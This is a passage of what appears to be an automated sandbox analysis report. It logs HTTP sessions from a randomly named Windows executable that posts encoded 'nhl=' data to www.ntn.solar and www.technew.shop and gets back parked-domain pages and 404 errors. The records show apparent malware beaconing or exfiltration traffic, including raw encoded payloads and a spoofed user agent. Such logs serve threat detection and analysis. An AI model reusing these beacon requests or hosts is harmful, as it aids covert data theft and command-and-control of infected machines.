                                                                                                                                                                Data Raw: 6e 68 6c 3d 45 55 35 69 50 58 6e 39 53 4b 37 45 56 43 6e 66 7a 52 4b 59 31 56 4c 63 61 6c 57 51 69 6e 39 2f 66 70 2b 76 61 7a 63 66 6f 37 42 68 4b 42 62 31 30 49 50 46 31 52 46 65 6d 77 6b 48 62 59 70 6c 49 65 39 45 52 42 73 4f 49 48 6e 67 65 32 6d 58 4b 73 56 52 68 38 5a 72 34 79 43 34 59 34 34 42 2b 48 79 69 31 4a 48 41 56 48 35 2f 77 4e 30 61 6e 74 67 72 75 2b 32 58 43 6d 31 50 55 59 77 79 44 36 30 2b 74 30 48 55 4f 39 70 71 54 59 37 33 55 47 6d 4f 33 43 44 7a 2f 4d 74 34 78 6a 50 44 50 36 4a 41 45 32 71 58 31 4c 45 58 53 71 4b 4f 35 72 50 47 6b 53 49 71 43 72 72 64 45 64 35 2f 44 5a 67 30 38 74 34 2b 4c 35 64 52 6d 4c 45 35 35 46 79 5a 74 32 4d 3d
                                                                                                                                                                Data Ascii: nhl=EU5iPXn9SK7EVCnfzRKY1VLcalWQin9/fp+vazcfo7BhKBb10IPF1RFemwkHbYplIe9ERBsOIHnge2mXKsVRh8Zr4yC4Y44B+Hyi1JHAVH5/wN0antgru+2XCm1PUYwyD60+t0HUO9pqTY73UGmO3CDz/Mt4xjPDP6JAE2qX1LEXSqKO5rPGkSIqCrrdEd5/DZg08t4+L5dRmLE55FyZt2M=
                                                                                                                                                                Oct 9, 2024 13:04:12.487884045 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                date: Wed, 09 Oct 2024 11:04:12 GMT
                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                content-length: 1106
                                                                                                                                                                x-request-id: 2cab0d69-95de-447f-902d-0119051a42cd
                                                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fRfhJuYho1+Ew8grthtGp0beeC2sBKQmFFfADOeQzq3m+od+/g2OzJyKSy03ZGouoQKQfo+vEQAROSvlL/9mpQ==
                                                                                                                                                                set-cookie: parking_session=2cab0d69-95de-447f-902d-0119051a42cd; expires=Wed, 09 Oct 2024 11:19:12 GMT; path=/
                                                                                                                                                                connection: close
                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 52 66 68 4a 75 59 68 6f 31 2b 45 77 38 67 72 74 68 74 47 70 30 62 65 65 43 32 73 42 4b 51 6d 46 46 66 41 44 4f 65 51 7a 71 33 6d 2b 6f 64 2b 2f 67 32 4f 7a 4a 79 4b 53 79 30 33 5a 47 6f 75 6f 51 4b 51 66 6f 2b 76 45 51 41 52 4f 53 76 6c 4c 2f 39 6d 70 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fRfhJuYho1+Ew8grthtGp0beeC2sBKQmFFfADOeQzq3m+od+/g2OzJyKSy03ZGouoQKQfo+vEQAROSvlL/9mpQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                                                                Oct 9, 2024 13:04:12.487898111 CEST506INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmNhYjBkNjktOTVkZS00NDdmLTkwMmQtMDExOTA1MWE0MmNkIiwicGFnZV90aW1lIjoxNzI4NDcxODUyLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cubnRuLnNvbGFyL3VkdHI


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                27192.168.11.3049848199.59.243.227806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:15.011703968 CEST1289OUTPOST /udtr/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.ntn.solar
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 3336
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.ntn.solar
                                                                                                                                                                Referer: http://www.ntn.solar/udtr/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 45 55 35 69 50 58 6e 39 53 4b 37 45 56 43 6e 66 7a 52 4b 59 31 56 4c 63 61 6c 57 51 69 6e 39 2f 66 70 2b 76 61 7a 63 66 6f 37 5a 68 4b 54 6a 31 37 4a 50 46 79 52 46 65 72 51 6b 43 62 59 6f 6c 49 61 51 4e 52 42 52 73 49 45 66 67 65 55 65 58 62 4e 56 52 30 4d 5a 72 6e 43 43 35 53 59 34 55 2b 48 6a 6c 31 4a 58 41 56 48 35 2f 77 4f 63 61 75 66 59 72 70 4f 32 51 53 32 31 49 51 59 77 4a 44 35 45 45 74 30 44 75 4f 37 31 71 54 72 44 33 56 30 4f 4f 33 43 44 7a 79 73 74 35 78 69 7a 58 50 36 52 71 45 31 36 70 31 62 6f 58 51 65 2f 33 68 5a 6e 35 2b 46 77 70 47 50 58 45 49 72 52 76 45 49 77 51 74 38 49 33 43 34 64 2b 2f 4f 34 65 70 57 47 63 2f 69 6f 45 74 52 6b 45 54 55 64 31 50 53 74 4a 45 6e 78 74 58 49 6b 6d 41 33 65 34 6e 50 73 4d 58 79 6f 6d 68 50 70 4a 4f 75 4e 56 41 32 4d 71 58 31 31 45 6d 45 33 46 39 42 49 30 4b 56 59 70 2b 71 72 4d 76 51 74 51 47 69 58 66 69 66 33 79 51 48 7a 4d 30 78 58 76 76 42 51 42 4d 59 6b 6d 58 4b 63 46 6e 4f 6f 6e 64 77 49 51 50 56 54 73 38 4a 6d 53 41 77 44 6f 49 34 [TRUNCATED]
                                                                                                                                                                Data Ascii: nhl=EU5iPXn9SK7EVCnfzRKY1VLcalWQin9/fp+vazcfo7ZhKTj17JPFyRFerQkCbYolIaQNRBRsIEfgeUeXbNVR0MZrnCC5SY4U+Hjl1JXAVH5/wOcaufYrpO2QS21IQYwJD5EEt0DuO71qTrD3V0OO3CDzyst5xizXP6RqE16p1boXQe/3hZn5+FwpGPXEIrRvEIwQt8I3C4d+/O4epWGc/ioEtRkETUd1PStJEnxtXIkmA3e4nPsMXyomhPpJOuNVA2MqX11EmE3F9BI0KVYp+qrMvQtQGiXfif3yQHzM0xXvvBQBMYkmXKcFnOondwIQPVTs8JmSAwDoI47D0rrLg2w8084pjrTht/EX2/yprKGZBNlXyIfyNbGlUiupqr1Mlcatx0csfKshJX/CC8cTpwgCCv9OTZjO2onI/PSoNGLhb1xkaP/GtWGTIEKeJKpZSFPTXSadQjXPrHc5lP2unNWZaOhk5KTGFdzXJ7kZrGXWFRBrJU97ZVLFqtcX6P7cFC5bcV8S7t+hbG+Ju5x8SgTmTAc2vyIwwSDbpFid1prFpCN+0qqkHEkWRcf2iGsOiOBTI+WnND2UsC62hLhDQTW0AMH0ybdAy/ubYbgf2/E58jCFSQrxTaSV0Ypl/L29VsJH5Xy7xGCAy9fjqv1uNEPFzoUXlAFdP/IiynawOKOqdWYlUOCX5l9pyOzuf5W5xfJ5oyMEMRN7Sv3dcckW9hcgXtzYRRyOQEG6U/bbnL1WXK+4HwzbIH9n27ojVDeI4DnF7ob18hst6OfEyb5/6UmyJzGeBiykU2cdYK/ocIIBlJZ2qbp+DDvqTSImUvCSf178xRxHddSaQ2lJCDUQofP66h74VOoE0eWYItuet0tRIkEiPbegf6
                                                                                                                                                                Oct 9, 2024 13:04:15.011753082 CEST2446OUTData Raw: 74 45 57 6c 2b 4f 55 55 55 37 70 4c 71 6b 35 39 5a 35 77 30 6c 65 6a 64 34 5a 72 73 33 58 65 41 42 35 45 4c 54 42 55 30 4c 54 71 33 47 44 7a 6a 35 69 4c 34 75 46 65 78 57 57 2f 4f 46 66 68 64 56 50 31 65 4f 79 4a 7a 6a 79 6a 53 61 52 42 67 79 50
                                                                                                                                                                Data Ascii: tEWl+OUUU7pLqk59Z5w0lejd4Zrs3XeAB5ELTBU0LTq3GDzj5iL4uFexWW/OFfhdVP1eOyJzjyjSaRBgyPkKpdZrSKE6cDv7OFg+GFYLo6f2y3+mAu94XZY76E0uioDoOT/9vGtebGK8T/NfENXOgoELm+O+099vmpAIZ8h+VTpgIJPbPFnUkHjH/Im/rx9CK2boW7s2HLKFilATUYSXVzTqcfhWNSONkr9ge8UbL9iB3nTcbsZ
                                                                                                                                                                Oct 9, 2024 13:04:15.114428043 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                date: Wed, 09 Oct 2024 11:04:14 GMT
                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                content-length: 1106
                                                                                                                                                                x-request-id: ec9e46ab-4c6c-4c07-94fa-5f69a6ba37b2
                                                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fRfhJuYho1+Ew8grthtGp0beeC2sBKQmFFfADOeQzq3m+od+/g2OzJyKSy03ZGouoQKQfo+vEQAROSvlL/9mpQ==
                                                                                                                                                                set-cookie: parking_session=ec9e46ab-4c6c-4c07-94fa-5f69a6ba37b2; expires=Wed, 09 Oct 2024 11:19:15 GMT; path=/
                                                                                                                                                                connection: close
                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 52 66 68 4a 75 59 68 6f 31 2b 45 77 38 67 72 74 68 74 47 70 30 62 65 65 43 32 73 42 4b 51 6d 46 46 66 41 44 4f 65 51 7a 71 33 6d 2b 6f 64 2b 2f 67 32 4f 7a 4a 79 4b 53 79 30 33 5a 47 6f 75 6f 51 4b 51 66 6f 2b 76 45 51 41 52 4f 53 76 6c 4c 2f 39 6d 70 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fRfhJuYho1+Ew8grthtGp0beeC2sBKQmFFfADOeQzq3m+od+/g2OzJyKSy03ZGouoQKQfo+vEQAROSvlL/9mpQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                                                                Oct 9, 2024 13:04:15.114444017 CEST506INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZWM5ZTQ2YWItNGM2Yy00YzA3LTk0ZmEtNWY2OWE2YmEzN2IyIiwicGFnZV90aW1lIjoxNzI4NDcxODU1LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cubnRuLnNvbGFyL3VkdHI


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                28192.168.11.3049849199.59.243.227806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:17.648009062 CEST343OUTGET /udtr/?nhl=JWRCMib9Ab6yKGK9tVnY1k7oTlzf3FlCZv+JaD8ekJd2eSGus8uX9j1aomNbYcA4VfgdKRJwSCfsWTeuLYlP9NwC5xq+bIEo1S2z3eaxb1ZDoYcdhdFludY=&9X=EvKH2xeP-DpP307P HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.ntn.solar
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Oct 9, 2024 13:04:17.749865055 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                date: Wed, 09 Oct 2024 11:04:17 GMT
                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                content-length: 1454
                                                                                                                                                                x-request-id: 6ec0d6ff-1398-495e-9d44-9f8b7ad5b9a8
                                                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Kw/cRBXebokJ2W1hVr8bre7lHC3YKAGE5V2ZqOoUcm+avtpasHjyqm7HKbbFE++hLaXeJFOhNrXwnQPl1bgR8A==
                                                                                                                                                                set-cookie: parking_session=6ec0d6ff-1398-495e-9d44-9f8b7ad5b9a8; expires=Wed, 09 Oct 2024 11:19:17 GMT; path=/
                                                                                                                                                                connection: close
                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4b 77 2f 63 52 42 58 65 62 6f 6b 4a 32 57 31 68 56 72 38 62 72 65 37 6c 48 43 33 59 4b 41 47 45 35 56 32 5a 71 4f 6f 55 63 6d 2b 61 76 74 70 61 73 48 6a 79 71 6d 37 48 4b 62 62 46 45 2b 2b 68 4c 61 58 65 4a 46 4f 68 4e 72 58 77 6e 51 50 6c 31 62 67 52 38 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Kw/cRBXebokJ2W1hVr8bre7lHC3YKAGE5V2ZqOoUcm+avtpasHjyqm7HKbbFE++hLaXeJFOhNrXwnQPl1bgR8A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                                                                Oct 9, 2024 13:04:17.749948025 CEST854INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmVjMGQ2ZmYtMTM5OC00OTVlLTlkNDQtOWY4YjdhZDViOWE4IiwicGFnZV90aW1lIjoxNzI4NDcxODU3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cubnRuLnNvbGFyL3VkdHI


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                29192.168.11.304985045.56.219.238806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:23.238399029 CEST607OUTPOST /n2yx/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.technew.shop
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.technew.shop
                                                                                                                                                                Referer: http://www.technew.shop/n2yx/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 76 58 32 75 67 4e 72 2b 68 43 31 2b 50 78 36 47 75 50 2f 53 78 2b 44 51 53 45 5a 4b 64 54 6c 51 2f 42 64 37 69 4d 62 6c 64 68 77 4d 61 49 58 46 4e 77 33 54 2f 35 33 39 73 4e 32 6c 36 2b 55 6f 72 64 2b 37 4f 6a 58 6c 55 6d 52 74 53 56 39 5a 57 33 55 42 39 59 70 55 6f 56 68 36 6a 35 74 6e 39 49 56 55 66 38 55 64 59 7a 70 50 41 6e 43 39 4c 41 50 68 6c 74 5a 78 51 47 74 42 36 32 48 4d 75 75 73 36 37 65 68 61 56 71 44 78 54 47 6d 42 33 34 45 63 4d 57 4b 35 77 43 56 63 42 63 34 34 67 4c 52 51 75 4c 50 5a 48 58 52 79 51 55 56 75 78 6a 5a 77 32 70 36 68 47 68 38 46 78 43 32 66 61 67 3d 3d
                                                                                                                                                                Data Ascii: nhl=vX2ugNr+hC1+Px6GuP/Sx+DQSEZKdTlQ/Bd7iMbldhwMaIXFNw3T/539sN2l6+Uord+7OjXlUmRtSV9ZW3UB9YpUoVh6j5tn9IVUf8UdYzpPAnC9LAPhltZxQGtB62HMuus67ehaVqDxTGmB34EcMWK5wCVcBc44gLRQuLPZHXRyQUVuxjZw2p6hGh8FxC2fag==
                                                                                                                                                                Oct 9, 2024 13:04:23.355555058 CEST479INHTTP/1.1 404 Not Found
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:04:23 GMT
                                                                                                                                                                Server: Apache
                                                                                                                                                                Content-Length: 315
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                30192.168.11.304985145.56.219.238806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:25.889766932 CEST627OUTPOST /n2yx/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.technew.shop
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 220
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.technew.shop
                                                                                                                                                                Referer: http://www.technew.shop/n2yx/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 76 58 32 75 67 4e 72 2b 68 43 31 2b 50 51 4b 47 6f 73 6e 53 6c 75 44 66 64 6b 5a 4b 47 6a 6c 63 2f 42 42 37 69 4e 50 31 63 56 63 4d 5a 70 6e 46 4b 78 33 54 34 35 33 39 30 64 32 6b 6b 4f 55 33 72 64 79 5a 4f 69 72 6c 55 6e 31 74 53 58 6c 5a 57 41 34 47 39 49 70 57 67 31 68 30 39 4a 74 6e 39 49 56 55 66 38 41 7a 59 79 42 50 44 58 53 39 4a 68 50 69 37 64 5a 75 48 32 74 42 2b 32 48 58 75 75 73 59 37 61 68 6a 56 75 7a 78 54 48 57 42 33 70 45 64 46 57 4b 2f 30 43 55 79 4a 63 4a 4e 70 76 59 74 34 72 54 5a 43 69 52 4f 56 44 6b 30 73 67 74 79 6c 4a 47 4d 61 67 52 74 7a 41 33 45 48 67 67 77 42 35 30 74 70 71 67 32 65 65 33 61 72 48 55 6f 44 75 6b 3d
                                                                                                                                                                Data Ascii: nhl=vX2ugNr+hC1+PQKGosnSluDfdkZKGjlc/BB7iNP1cVcMZpnFKx3T45390d2kkOU3rdyZOirlUn1tSXlZWA4G9IpWg1h09Jtn9IVUf8AzYyBPDXS9JhPi7dZuH2tB+2HXuusY7ahjVuzxTHWB3pEdFWK/0CUyJcJNpvYt4rTZCiROVDk0sgtylJGMagRtzA3EHggwB50tpqg2ee3arHUoDuk=
                                                                                                                                                                Oct 9, 2024 13:04:26.005774021 CEST479INHTTP/1.1 404 Not Found
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:04:25 GMT
                                                                                                                                                                Server: Apache
                                                                                                                                                                Content-Length: 315
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
